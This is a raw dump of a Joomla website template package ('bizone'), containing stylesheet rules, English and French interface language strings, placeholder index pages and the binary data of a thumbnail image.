.blog-item .post-comment form input[type="submit"]:hover , 
.contact form input[type="submit"]:hover{
	background:#1b1d1f;
}
 
.widget{
	margin-bottom:40px;
	color:#1b1d1f;
}

.widget h4 , .widget img{
	margin-bottom:25px;
}
.widget > img{
	width:100%;
}

.search_box input {
  border: 1px solid #d9d9d9;
  height: 53px;
  padding-left: 15px;
  position: relative;
  width: 100%;
  font-size:14px;
}

.search_box i {
  border-left: 1px solid #d9d9d9;
  bottom: 0;
  color: #d9d9d9;
  font-size: 24px;
  height: 53px;
  padding: 15px;
  position: absolute;
  right: 15px;
  top: 0;
  cursor:pointer;
}

ul.category li{
	margin-top:15px;
	display:block;
}

ul.category li a{
	color:#1b1d1f;
	font-size:16px;
	border-bottom:1px solid #d9d9d9;
	padding-bottom:15px;
	display:block;
	text-transform:capitalize !important;
}
ul.category li a:hover , ul.category li a:focus{
	color:#82b440;
}

ul.category li a .date{
	color:#82b440;
	font-size:12px;
	display:none;
}

/*=========================================*/
          /* Blog Ends */
/*=========================================*/




          /* Inner Pages Top*/
.innerpage-banner {
	background: no-repeat center center / cover;
	padding-top: 200px;
	max-height:440px;
	border-bottom: 5px solid rgba(0,0,0,0.9);
	color: #ffffff;
	
}
.tagline {
	color: #fff;
	text-transform: uppercase;
	font-size: 14px;
}




@media screen and (max-width: 1299px){
    .navbar-default .navbar-nav > li{
		  margin: 0 20px;
	  }
	.info-section .bg{
		padding-top:100%;
	}
	.blog-wrap .blog-content {
	  padding: 3.5em 0;
	}
	
	 .layer-content-responsive {
		max-height:400px !important;
		overflow:hidden;
	}
}


@media screen and (max-width: 1024px){
	
	h2{ font-size:36px; }
	h3{ font-size:20px; }
	h4{ font-size:16px; }
	
}

@media screen and (max-width: 1000px){
	 
.navbar-default .navbar-nav > li {
	margin: 0 6px;
}
.navbar-default .navbar-nav > li > a {
  letter-spacing: 0;
}
.text-rotator {
  padding-top:150px;
}
#paralax-slider .item-content p{
  font-size:16px;
}
#paralax-slider .item-content h2 {
  font-size:46px;
  margin-bottom:10px;
}
.r-test ul.r-feature li {
font-size: 12px;
}
.we-do .do-wrap, .white-box {
margin-bottom:30px;
}
.pricing_item {
flex: 0 1 320px;
}
#bg-paralax , #testinomial, .text-rotator{
  background-position:center center !important;
}	
#slogan{
text-align:center;
}
#slogan p{s
font-size:16px;
}	
#slogan a.pull-right {
float: none !important;
margin-top: 30px;

}


		
}



@media screen and (max-width: 767px){

  h2{ font-size:30px; }
  #main-navigation{ background-color: #1b1d1f; }
  
  .navbar-brand, #navigation.affix .navbar-brand{ display:inline-block;  padding: 10px 0;}
  .navbar-default .navbar-nav > li > a, #navigation.affix  .navbar-default .navbar-nav > li > a {
	  padding: 10px 0;
	}
   ul.top-right, #navigation.affix ul.top-right{
		margin:0;
		position:relative;
		right:37px;
		margin-top:-2px;
	}
	ul.top-right, #navigation.affix ul.top-right{
		top:14px;
	}
	.navbar-default.social .navbar-toggle {
     right: -100px !important;
  }
  .main-button { top: 10px;}
	  .push_nav_brand {
	  margin: 12px 0 30px 15px;
	  width:90;
  }
  .push_nav li a {
  font-size:12px;
  padding: 8px 15px;
}
.text-rotator {
  padding-top:80px;
}
#paralax-slider .item-content p{
  font-size:14px;
}
#paralax-slider .item-content h2 {
  font-size: 26px;
  margin-bottom:10px;
}
	#bg-paralax h1, #bg-paralax h2{
		font-size:30px;
	}
	.we-do .do-wrap,
	.thinkers .thinker-wrap{
		margin:30px 0;
	}
	#thinkers{
		padding-bottom:45px;
	}	
	.thinker-image .overlay {
	  height: 60px;
	}
	#project{ padding-top:0;}
	#responsive{
	}
	#responsive .responsive-pic > .col-md-6 > img{
	  margin-bottom: 25px;
	}
	.number-counters > .col-xs-12{
		width:50%;
	}	
	.circliful {
	  margin-bottom: 50px;
	}
	.circliful:first-child {
	  margin-left:25px;
	}
	#testinomial-slider .item p{
		font-size:14px;
		margin:0;
	}
	#testinomial-slider .owl-prev, #testinomial-slider .owl-next{
		display:none;
	}
	#publication-slider .owl-prev{
		left:10px;
	}
	#publication-slider .owl-next{
		right:10px;
	}
	#publication-slider .owl-prev, #publication-slider .owl-next{
		background:#fff;
		top:19%;
		
	}
	
	
	.circliful {
	  margin-bottom: 50px;
	  margin-left:0;
	  float:none;
	  display:inline-block
	  
	}
	.circliful:first-child {
	  margin-left: 0;
	}
	
	
	
		
}


@media screen and (min-width: 641px) and (max-width: 767px) { 

      .thinkers .col-sm-4{
		  width: 48%;
		  display:inline-block;
	  } 
	  
	 
	  
	  
	  
	  
	  
   
}




@media screen and (max-width: 480px) {
	.navbar-brand img{
		width:75%;
	}
	ul.top-right{
		top:14px;
	}
	.circliful {
	  margin-bottom: 50px;
	  position:relative;
	  left:30%;
	  margin-left:0;
	  float:none;
	  -moz-transform:translate(-50%,0);
	 -ms-transform:translate(-50%,0);
	 -webkit-transform:translate(-50%,0);
	 -o-transform:translate(-50%,0);
	  transform:translate(-50%,0);
	}
	.circliful:first-child {
	  margin-left: 0;
	}
	
	.layer-content-responsive {
		max-height:240px !important;
		overflow:hidden;
	}
}



@media screen and (max-width: 479px){
	
	#main-navigation{
		top:0;
	}
	
}

.morepost-wrap ul.pagination-list {
    margin: 0;
    padding: 0;
    width: 100%;
}
.morepost-wrap ul.pagination-list li {
    display: none;
}
.morepost-wrap ul.pagination-list li.morepost {
    display: block;
}
.morepost-wrap .pagination > li > a {
    border: medium none;
}
.morepost-wrap .pagination > li > a:focus, .morepost-wrap .pagination > li > a:hover {
    background-color: transparent;
    color: #07aaa5;
}
#itemListLeading > .itemContainer:last-child .blog-item-v3{
	padding: 0;
	border: none;
}
.pagination-list .morepost-wrap{
	border-bottom: 1px solid #d1d2d2;
	border-top: 0;
	margin-top: -70px;
	padding-bottom: 20px;
}
body.com_k2 #area-main.padding{
	padding-bottom: 70px;
}
.blog-item div.itemComments {
    background: rgba(0, 0, 0, 0) none repeat scroll 0 0;
    border: medium none;
    border-radius: 0;
    padding: 0;
}
body.com_k2 div.itemBackToTop{
	display: none;
}
body.com_k2 div.itemCommentsForm form input#submitCommentButton{
 	background: #82b440 none repeat scroll 0 0;
    border: 1px solid transparent;
    color: #fff;
    font-weight: bold;
    height: 50px;
    position: relative;
    width: 185px;
    border-radius: 0;
    padding: 0;
    margin: 0;
}
body.com_k2 div.itemCommentsForm form input#submitCommentButton:hover{
	background: #000;
}
body.com_k2 div.itemCommentsForm form span#formLog{
	margin-left: 0;
	margin-right: 0;
}
.blog-reply.media{
	margin-top: 20px;
}
#about.section-padding.btwe-offer{
	padding-top: 130px!important;
}PK!B�Nr

*bizone/language/en-GB/en-GB.tpl_bizone.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt, see LICENSE.php
; Note : All ini files need to be saved as UTF-8 - No BOM

TPL_BIZONE_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Nayax is the Joomla 3 site template based on Bootstrap from Twitter and the launch of the Joomla User Interface library (JUI)."

TPL_BIZONE_BACKGROUND_COLOR_DESC="Choose a background colour for static layouts. If left blank the Default (#F4F6F7) is used."
TPL_BIZONE_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_BIZONE_BACKTOTOP="Back to Top"
TPL_BIZONE_COLOR_DESC="Choose an overall colour for the site template. If left blank the Default (#0088CC) is used."
TPL_BIZONE_COLOR_LABEL="Template Colour"
TPL_BIZONE_FLUID="Fluid"
TPL_BIZONE_FLUID_LABEL="Fluid Layout"
TPL_BIZONE_FLUID_DESC="Use Bootstrap's Fluid or Static Container (both are Responsive)"
TPL_BIZONE_FONT_LABEL="Google Font for Headings"
TPL_BIZONE_FONT_DESC="Load a Google font for the headings (H1, H2, H3, etc.)"
TPL_BIZONE_FONT_NAME_LABEL="Google Font Name"
TPL_BIZONE_FONT_NAME_DESC="Example: Open+Sans or Source+Sans+Pro"
TPL_BIZONE_LOGO_LABEL="Logo"
TPL_BIZONE_LOGO_DESC="Upload a custom logo for the site template."
TPL_BIZONE_STATIC="Static"

TPL_BIZONE_FAVICO_LABEL = "Custom Favico"
TPL_BIZONE_FAVICO_DESC = "Upload a custom favico for the site template"
TPL_BIZONE_APPLE_TOUCH_LABEL = "Apple Touch"
TPL_BIZONE_APPLE_TOUCH_DESC = "Upload a Apple Touch for the site template"
TPL_BIZONE_APPLE_TOUCH_57_LABEL = "Apple Touch (57x57)"
TPL_BIZONE_APPLE_TOUCH_57_DESC = "Apple Touch (57x57)"
TPL_BIZONE_APPLE_TOUCH_72_LABEL = "Apple Touch (72x72)"
TPL_BIZONE_APPLE_TOUCH_72_DESC = "Apple Touch (72x72)"
TPL_BIZONE_APPLE_TOUCH_114_LABEL = "Apple Touch (114x114)"
TPL_BIZONE_APPLE_TOUCH_114_DESC = "Apple Touch (114x114)"
TPL_BIZONE_APPLE_TOUCH_144_LABEL = "Apple Touch (144x144)"
TPL_BIZONE_APPLE_TOUCH_144_DESC = "Apple Touch (144x144)"
TPL_BIZONE_CSS_LABEL = "CSS"
TPL_BIZONE_CSS_DESC = "Custom CSS"
TPL_BIZONE_JS_LABEL = "Tracking Code(Google Analytics)"
TPL_BIZONE_JS_DESC = "Tracking Code(Google Analytics)"
TPL_BIZONE_BACKGROUND_IMAGE_LABEL="Background Image"
TPL_BIZONE_BACKGROUND_IMAGE_DESC="Choose a background Images for static layouts. If image too small, images will be repeat"
TPL_BIZONE_DIRECTION_LABEL = "Direction"
TPL_BIZONE_DIRECTION_DESC = "Direction"
TPL_BIZONE_DIRECTION_LTR = "LTR"
TPL_BIZONE_DIRECTION_RTL = "RTL"
K2_ALL_WORKS = "All"
TPL_BIZONE_VIEW_ALL = "View All"

COM_TEMPLATES_LAYOUT_FIELDSET_LABEL = "Layout"
TPL_BIZONE_404_PAGE_LABEL = "Choose Page 404"
TPL_BIZONE_404_PAGE_DESC = "Choose Page 404"

COM_TEMPLATES_OTHER_FIELDSET_LABEL = "Other"
TPL_BIZONE_LOADING_LABEL = "Loading Page"
TPL_BIZONE_LOADINGIMG_LABEL = "Image Loading"
TPL_BIZONE_LOADINGBG_LABEL = "Background Loading Color"
TPL_BIZONE_LOADINGBGIMG_LABEL = "Backround Loding Image"
TPL_BIZONE_STATE_CAPTCHA_LABEL = "Google Captcha Contact Form"
TPL_BIZONE_SITEKEY_LABEL = "SiteKey"
TPL_BIZONE_SECRET_LABEL = "Secret"

TPL_BIZONE_PREVIOUS = "Précédent"
TPL_BIZONE_NEXT = "Suivant"

COM_BLUE_PAGEBUILDER_NAME_MUST_NOT_BE_EMPTY_TEXT="le nom de doit pas être vide"
COM_BLUE_PAGEBUILDER_PLEASE_PROVIDE_A_VALID_EMAIL_TEXT="Merci d'indiquer une adresse mail valide"
COM_BLUE_PAGEBUILDER_PLEASE_PROVIDE_A_VALID_SUBJECT_TEXT = "Ce champs ne doit pas être vide"
COM_BLUE_PAGEBUILDER_MESSAGE_SHOULD_NOT_BE_EMPTY_TEXT="Vous devez taper un message"
COM_BLUE_PAGEBUILDER_CAPTCHA_NOT_VALIDATED = "Captcha Error"
COM_BLUE_PAGEBUILDER_YOUR_NAME_TEXT="Votre Nom:"
COM_BLUE_PAGEBUILDER_YOUR_PHONE_TEXT = "Numéro de Téléphone"
COM_BLUE_PAGEBUILDER_YOUR_COMPANY_TEXT = "Votre entreprise"
COM_BLUE_PAGEBUILDER_YOUR_WEBSITE_TEXT = "Votre site internet"
COM_BLUE_PAGEBUILDER_SUBJECT_TEXT = "Objet"
COM_BLUE_PAGEBUILDER_VALID_EMAIL_ID_TEXT="Votre Email"
COM_BLUE_PAGEBUILDER_YOUR_MESSAGE_TEXT= "Message..."
COM_BLUE_PAGEBUILDER_BTN_SUBMIT = "ENVOYER"PK!r]w>��.bizone/language/en-GB/en-GB.tpl_bizone.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt, see LICENSE.php
; Note : All ini files need to be saved as UTF-8 - No BOM

TPL_BIZONE_POSITION_BANNER="Banner"
TPL_BIZONE_POSITION_DEBUG="Debug"
TPL_BIZONE_POSITION_POSITION-0="Search"
TPL_BIZONE_POSITION_POSITION-10="Unused"
TPL_BIZONE_POSITION_POSITION-11="Unused"
TPL_BIZONE_POSITION_POSITION-12="Unused"
TPL_BIZONE_POSITION_POSITION-13="Unused"
TPL_BIZONE_POSITION_POSITION-14="Unused"
TPL_BIZONE_POSITION_POSITION-15="Unused"
TPL_BIZONE_POSITION_POSITION-1="Navigation"
TPL_BIZONE_POSITION_POSITION-2="Breadcrumbs"
TPL_BIZONE_POSITION_POSITION-3="Top center"
TPL_BIZONE_POSITION_POSITION-4="Unused"
TPL_BIZONE_POSITION_POSITION-5="Unused"
TPL_BIZONE_POSITION_POSITION-6="Unused"
TPL_BIZONE_POSITION_POSITION-7="Right"
TPL_BIZONE_POSITION_POSITION-8="Left"
TPL_BIZONE_POSITION_POSITION-9="Unused"
TPL_BIZONE_POSITION_FOOTER="Footer"
TPL_BIZONE_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Bizone is the Joomla 3 site template based on Bootstrap from Twitter and the launch of the Joomla User Interface library (JUI)."
PK!߄�B   bizone/language/en-GB/index.htmlnu&1i�<!DOCTYPE html><title></title>
PK!�VҀ��.bizone/language/en-GB/en-GB.tpl_bizone.ini_oldnu&1i�; Joomla! Project
; Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt, see LICENSE.php
; Note : All ini files need to be saved as UTF-8 - No BOM

TPL_BIZONE_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Nayax is the Joomla 3 site template based on Bootstrap from Twitter and the launch of the Joomla User Interface library (JUI)."

TPL_BIZONE_BACKGROUND_COLOR_DESC="Choose a background colour for static layouts. If left blank the Default (#F4F6F7) is used."
TPL_BIZONE_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_BIZONE_BACKTOTOP="Back to Top"
TPL_BIZONE_COLOR_DESC="Choose an overall colour for the site template. If left blank the Default (#0088CC) is used."
TPL_BIZONE_COLOR_LABEL="Template Colour"
TPL_BIZONE_FLUID="Fluid"
TPL_BIZONE_FLUID_LABEL="Fluid Layout"
TPL_BIZONE_FLUID_DESC="Use Bootstrap's Fluid or Static Container (both are Responsive)"
TPL_BIZONE_FONT_LABEL="Google Font for Headings"
TPL_BIZONE_FONT_DESC="Load a Google font for the headings (H1, H2, H3, etc.)"
TPL_BIZONE_FONT_NAME_LABEL="Google Font Name"
TPL_BIZONE_FONT_NAME_DESC="Example: Open+Sans or Source+Sans+Pro"
TPL_BIZONE_LOGO_LABEL="Logo"
TPL_BIZONE_LOGO_DESC="Upload a custom logo for the site template."
TPL_BIZONE_STATIC="Static"

TPL_BIZONE_FAVICO_LABEL = "Custom Favico"
TPL_BIZONE_FAVICO_DESC = "Upload a custom favico for the site template"
TPL_BIZONE_APPLE_TOUCH_LABEL = "Apple Touch"
TPL_BIZONE_APPLE_TOUCH_DESC = "Upload a Apple Touch for the site template"
TPL_BIZONE_APPLE_TOUCH_57_LABEL = "Apple Touch (57x57)"
TPL_BIZONE_APPLE_TOUCH_57_DESC = "Apple Touch (57x57)"
TPL_BIZONE_APPLE_TOUCH_72_LABEL = "Apple Touch (72x72)"
TPL_BIZONE_APPLE_TOUCH_72_DESC = "Apple Touch (72x72)"
TPL_BIZONE_APPLE_TOUCH_114_LABEL = "Apple Touch (114x114)"
TPL_BIZONE_APPLE_TOUCH_114_DESC = "Apple Touch (114x114)"
TPL_BIZONE_APPLE_TOUCH_144_LABEL = "Apple Touch (144x144)"
TPL_BIZONE_APPLE_TOUCH_144_DESC = "Apple Touch (144x144)"
TPL_BIZONE_CSS_LABEL = "CSS"
TPL_BIZONE_CSS_DESC = "Custom CSS"
TPL_BIZONE_JS_LABEL = "Tracking Code(Google Analytics)"
TPL_BIZONE_JS_DESC = "Tracking Code(Google Analytics)"
TPL_BIZONE_BACKGROUND_IMAGE_LABEL="Background Image"
TPL_BIZONE_BACKGROUND_IMAGE_DESC="Choose a background Images for static layouts. If image too small, images will be repeat"
TPL_BIZONE_DIRECTION_LABEL = "Direction"
TPL_BIZONE_DIRECTION_DESC = "Direction"
TPL_BIZONE_DIRECTION_LTR = "LTR"
TPL_BIZONE_DIRECTION_RTL = "RTL"
K2_ALL_WORKS = "All"
TPL_BIZONE_VIEW_ALL = "View All"

COM_TEMPLATES_LAYOUT_FIELDSET_LABEL = "Layout"
TPL_BIZONE_404_PAGE_LABEL = "Choose Page 404"
TPL_BIZONE_404_PAGE_DESC = "Choose Page 404"

COM_TEMPLATES_OTHER_FIELDSET_LABEL = "Other"
TPL_BIZONE_LOADING_LABEL = "Loading Page"
TPL_BIZONE_LOADINGIMG_LABEL = "Image Loading"
TPL_BIZONE_LOADINGBG_LABEL = "Background Loading Color"
TPL_BIZONE_LOADINGBGIMG_LABEL = "Backround Loding Image"
TPL_BIZONE_STATE_CAPTCHA_LABEL = "Google Captcha Contact Form"
TPL_BIZONE_SITEKEY_LABEL = "SiteKey"
TPL_BIZONE_SECRET_LABEL = "Secret"

TPL_BIZONE_PREVIOUS = "Previous"
TPL_BIZONE_NEXT = "Next"

COM_BLUE_PAGEBUILDER_NAME_MUST_NOT_BE_EMPTY_TEXT="Name must not be empty"
COM_BLUE_PAGEBUILDER_PLEASE_PROVIDE_A_VALID_EMAIL_TEXT="Please provide a valid email"
COM_BLUE_PAGEBUILDER_PLEASE_PROVIDE_A_VALID_SUBJECT_TEXT = "Subject must not be empty"
COM_BLUE_PAGEBUILDER_MESSAGE_SHOULD_NOT_BE_EMPTY_TEXT="Message should not be empty"
COM_BLUE_PAGEBUILDER_CAPTCHA_NOT_VALIDATED = "Captcha Error"
COM_BLUE_PAGEBUILDER_YOUR_NAME_TEXT="Your Name:"
COM_BLUE_PAGEBUILDER_YOUR_PHONE_TEXT = "Your Phone"
COM_BLUE_PAGEBUILDER_YOUR_COMPANY_TEXT = "Your Company"
COM_BLUE_PAGEBUILDER_YOUR_WEBSITE_TEXT = "Your Website"
COM_BLUE_PAGEBUILDER_SUBJECT_TEXT = "Your Subject"
COM_BLUE_PAGEBUILDER_VALID_EMAIL_ID_TEXT="Your Email"
COM_BLUE_PAGEBUILDER_YOUR_MESSAGE_TEXT= "Message..."
COM_BLUE_PAGEBUILDER_BTN_SUBMIT = "SEND MESSAGE"PK!߄�B  bizone/language/index.htmlnu&1i�<!DOCTYPE html><title></title>
PK!��`����bizone/template_thumbnail.pngnu&1i����JFIF��"ExifMM*��~http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        ">
	<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
		<rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6223F8715BD3E211B2DDF3498BA4C5E3" xmpMM:DocumentID="xmp.did:B8E98C7E4A8B11E69D65B6804E2869D4" xmpMM:InstanceID="xmp.iid:B8E98C7D4A8B11E69D65B6804E2869D4" xmp:CreatorTool="Adobe Photoshop CS5 Windows">
			<xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B148EAAE8B4AE611A452C3CB758A5E71" stRef:documentID="xmp.did:6223F8715BD3E211B2DDF3498BA4C5E3"/>
		</rdf:Description>
	</rdf:RDF>
</x:xmpmeta>
<?xpacket end='w'?>��C		



	
��C��,N"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?򠸡��)�2i�Ϲ��wk��{�'�p�1mj�G[�fɸw<V47~Y�#Qz��)�IX��Z3\���ի��5���\�|@�n�JS��cU�Y�q���+��Lb��jq}�Rk:�bC�W�a%(���eM7tq�f�kS�Z�:���=Z�̓���3��k���M)ŧ�����2��Z5��כ�O��ZD�i�v�\�m�k�qJZ�^�Yn۪u]՛�]y�V�Gp���*��Ӏ��
MZ�1Ji�)��JT�P�<%5F�RPl�QL�~���$���-X�U�sY�!9�o�;��O�z�
^3���F�?3u�Y��o�3׍^饮�ֶ�nT\p1��hk2J�j��NkF�Hb*��k	�,uQ����i/;��ç���t�~�o��2�>Z�k✏��Ѝ$d��D/J��/ں+=,(�ZV�X�?hΚ�Q��xsʕN��>��̲�X�R�UF�<��Rf���^�����*÷5^u�UY�i������2i�=+���Y-������O��9���ҽ�j3f���"Hƥ�s�}h�U%�ٚ��,T����[�$b�p}n�GaR\���d#��+X�$e��V�E'ҭ<�ydn5�.�3�����b�7�19]SO{�5E<=�һ'��ҡk%^…�f����_/J�|;�Һ�SQ���Q�J�G3���
X�HU�[Mn4�S�.>S5t�9m��,��s++-�6kL�\���,��b���40��>L�v�V�v�-%sҏhm}�|N_��ty$�v���4�O;0��y6�}I�P��?f?��|
�ǝ&�4}@,7�/8P~Yyr~�����Iխ��2���x�-n�I���"�A��x�$�)�~�m����|�+���l���$��j�U�9��S�W�4E�_hZ���p��6�WEfO,��U'+�3�g���x�S��V��/5׋��%6r.�f���$c��ǘ~_z�rܵ��֔c'(EI[[�h��Y�m����59��ɿ��3�|�\��su�g���%��+Xa�t���,����4���67����Y������u8e#�b���U��R��<�r�|�����q=�N���\���X؂�l�k���<Q�����E�$3Y4��#����OB+��޺s��K>io}��v�NG��W�m���y外붲V��S�~���\�ׯu
2��{�������7m�6d�	��_`��מ~џ��x&K��ͬ�+&�jO.��a�b�'ׁߏ+������r���?%���8z5+MR����'������md�����q(�P��v��58���^��[���W7��=���4ҹ�;��'�Mr�����⿥2<0*xH����o���08U��Ƅz/ǫ�ϲ�N��w�<`椖��Z�#�%�­f�7��֩�^%KEl�q:���K.��w3
��N��ZX��V}�V%�߭p:��|��Vd�%�s��g,�W2�%3��|\e�֮b�Qk�95Y&k��:D�3^�#�����Nj���?
�x�0D�tZ��Բ溥%�M�����5ԕ�O�z���,(���x;URW����;8�t�
���Glab�^H-�QYZ��m��]�8u�Q�t�*1�k�Οw�I�]�Ϙ�����kij֙���t�����\y�*�9H�2h� ������MH"
Z(��(�S�n4�1��gk�6�Z��lbپ�S�)ù���{<�5��c�5y�����5�RZ�a�6#hⴭ�G�%��V����ԑ�SK,V���*+hkF�*瑣�b�
з�^�:�
T��4+���������g5Ԅ�Ln���W�8�:����pi�ܮ�Tn�;
���dِ8�Q�3����S(���u�R�ަ?Z�X��uD�Ն\�]iܢ��Uyc��j���R�GLx���Q�V��Q���/�*�%F��X�M�
���|��b�9W.ߧ�K���
E��)���"}�!���i}_���J�KC��If�=Z6���G��\x�]'C(������0���tꫦ~��5��៊���N��a������l=~���]}~k[�Ѻ��+)pA����|g�V;?j��,�r��|�_�c�:nW��Ӵ����W�|<������G=�v�<�ȑ����Tz�_\��.b��"�W����
q�-���x���XԵ�BO;2/�s��
��s�r��X��w��s����i/+��>���j��v�Zh-��`�h���>��:���Ǟ5�>"���V�.伽����GeQ�Tv��(櫺�B�8w�G�*�{���y/�ϭ�rz5��wս��"����5�,UG_As�j�xW��i�~n�{[���ڼ�¾'�,+��R���y�a��}4���C�S�ƾ7!��?ԼO%ğx�}kY}B��Ua�ikأN0G�Z�e�;ƸnMlZ�ٓXvћsZ6��ɶ���ѧe��
ʩ�j���^���E���_n4��ha{}J����_:	2�q�d1��]�/�7�-5��$��|5�ɬ܉ٔ�
IeS
r��p�q�:�:�jJ�	)E�֨�S\���1�ƕ��עh[H���^��K�0�������	h7>64h5��t�{vB`��P�L��a�r�O�a���o��a����^'�|/uokw6�����b�qoyḧā��q��j����SH�n�Tf|�z׈�c�x{ú>�uu�ƺ׆g�\Py�y��D��<�	]T
���|=�5/���R�w��=iyyyaag|��]j2���Ž���?i�A��'���7ѣ����l�i|5�k}��T��k;X�m.�V����c�Sq*�,�R5��@H��|���<I���þ�7�O��X{��w;C�QGoұU*��6�u��(�y~��y�N=������}��f�A�4�.<Q��5��Ε��5�]j�5�[�4Ryg
�T<�FJ���|F������<��{��MQ���E�L�6�Ug�_��w0��#5a>��:�p3[6��Z��c���_XY\�Z^�o���j�7�y�Ⱥ��%,��*���N0q�	ϰl�N�7Ҭ������`.Fri�'55P9�NC�:�(��L�4�8�/—7ѣ�VH侁Y\nVE�#��^fS�5KY��f�k��������i��/D�G�V�K�^�[������)�Q�O��p��>��C�
+�Ȗ��|/Դw�H�
�iwp��J6��q�G9B�~z|JNZ��H���3�
��.xw���/��]j�$i�hF����N7��M�ן�$|��w�}�|$��~0|-��z���*m>K=T�����]�X�}ݤ`��r���[��%a�+N�����Kh�^\��Gbkh+B����������|0�5|`���>�Y�i��e׊57-�g#2��#�P��A��ը��ϙm��Z�:��Q�����W�k�ž�[��@���M�a�f�t�O���
��S���)f��C������|M��N#�ĺN��ޘ�6����@�J���Z�gOe/�O��rʤ�q�u��gƢ:x\װ��߲m����-A5�
k6����#���e��7��8��y+9E�ٕ&��0�5�V�a�L�.D�"��{T�QIM+8Ȩ�sS;TE�L��dTl;S�b��@��֜��7u4�1�i�٦�����d��1ɭ��u�� :^�ֿk��O/�/P=X���#:աJ�Gh�[}	�R0��ݒ9w��h�CXҮ4-J{;�$���s�H�Yu��G�|�C�+���T�t�<Ek=旡M����P��l�Lv�l��)1�N�/nmN�W��̭s�Z:�����2��Rx�γ�ˏX]Ž���4-0lm۳j����n��럲?�+Ok�&��}oųxf.u;��7��q�έ#,yA��,ʷP3Z$�̺�\c�1�y�ٗ�O�<%��|<�α����Ԭ�+��Is+B6ʈP��>�R�A�?ٓ�V����6�<sq��E�΋�tڍ�D�	�*��rT�sȧ��̎��l���	�o���mm��eq�*�W���|l#��0��v�29"�|��oj�߇�#�{E�Զ��iS�Z��)l�")X�PO�G5<��e��6
]�Et	��m�^������,0]�
:o:�I�R�6�ZGeUŀ$
���:�}�]i� �_�4=J��N��P�.-g�������-�.�䁞iJ,�e��l4�2kм9�)|L�w��Oi��e�����y{w�+,�F��>1��̀
$	���k��mm|a�_xR�/�[E�i�X��y��YUK.x���g(������9ؗ����G�\Va!���e`�Rt�E)V�tɫ��@�Z^:��ϭ\�j�Q&L���a�<+~������q�����>��xz5�A5��-O��e�;Mi-[1Y�qTbE�qN���O�Vr��F�!{##�k�?g�I������n�Z�C}�qz�0�3��ֲ|3���K/�^����)+^~64�R�
��Z�>Z�:*Q�ǹ|_���k^�����s
I;�)�-��G����;�J�/�W��}��U��ޱ�jڷ������2S����802�.���<�98��5m����ψ>'k?پе��+���R]���22q���_;�d�2�?��m��m�]���'
��r�]�����x���>!�<4��]�M����7�2�I2���p�@#����h��2���>"��u
V�g]rEM���ZXFY��&�W8]ѮOj�xkS�n�u��}���Y?�qiyA<
�k��zp@�Y&�K���gU���3�'P�oG��\h��t�}�7_b�-%���x∪a���Z�7�A�c�U��㏊�ƃ�����-4}wͷ	����"�
��b���@O�+�x�)$����X�v��yB<��4%A�;p��j�9���m�"�	�s�ȥ^6H<�FJ.a�o�v�)�m����]�Eqp@ǧ�ZV�ۋIp c��-ש<t����|��W����t-Z�Vҵ-�A��c�9�'�c�&WW�%�G�ƕ��
<I��2��w��,�?���=N{	c��a��b����'�C@����о�v�T�ω,nm��MP�lž�3L��v�Fw�7
�H�3HC3����<�D��rx��5浣�Kv�3m��\�A� ]������Ys�'>��� ��=6�P���K˅���0A�V
�E��V
ψ�?z�S�Q�{��R�QӾ2x�I���ZԥӴx4��gX�#Ե��i	��U�@c$C2;l�2��ןZŲ�ՠ��d�]B��ů-��qDf�A��w�rpGL�qjk�Y�W�f���d��"�0�R-�j9�'���\Tԓi��:e��֗0���,W���m$�pH�E��z�t�����^�i���+'�F��Hn��+,ֿ��4O����F-s�kկ���{���B����V}�����-|_���e�/
�'Tմ]A퍵�R�`���`3��+Gj�C�����]x�E��N�lA��u�J{[d=X�7O���H�Y�G����	��~<��|S�->�	-<�{mJh��6p�U�$�Rk�'�k|R�c�-����C2�f�{���g�B��؂
T�A=Erz��_�/����=ܺDž~��j�Db�׹ry�c,�h>��'�]�Y���0?i���}�
��˥�S�$�zp��l�H��ᶑ���P����Kÿ�f�_�}O�޵�9.�X�B!���ܐ.#A—
ā�H$�~�:v�$��L�7�xo�K�sT��o'��)�w_�������:�}�|5�Ĕ�-���F�/"�*۷��cПJ�s���玴��w�M��5-oZ�KK;h�6�����I'�'���N�_f�=���	�3��.c���WOh�9n��
���~G�O8�c�B�xu%�E��YG{j�������O�>���'�>�<E�=O�lvv��*�`�h�C)PX�X�Ls��
�F��~�b%�%wȜ	��m��S2�}�W��o2F�س��3�=ɯ�?৲��>��6�P�~���c"�sfUeO�����9������G���8�Ԝ%V7��ƾ�r�ٟi|ky>.�~���j?�Uwᅙ��me��U�p�bP;U���<#�C��H�tv�[�E�#�'�K�tR%]�0�� ����/���/�Z}���|q�ۭV�6/mRB�=���U���դ��E�M��rG������[�F��C���9[��i��P�>
]ɣ|�i�?xf̘`��4��j��<ۙ���m�!zg�ꬼ}�)������g�?�h��[=_B���ZD�ώx�䌌N�p��}K��_Z�!�|��o�� ���mQJ��.YlUJ*1�[��σ�
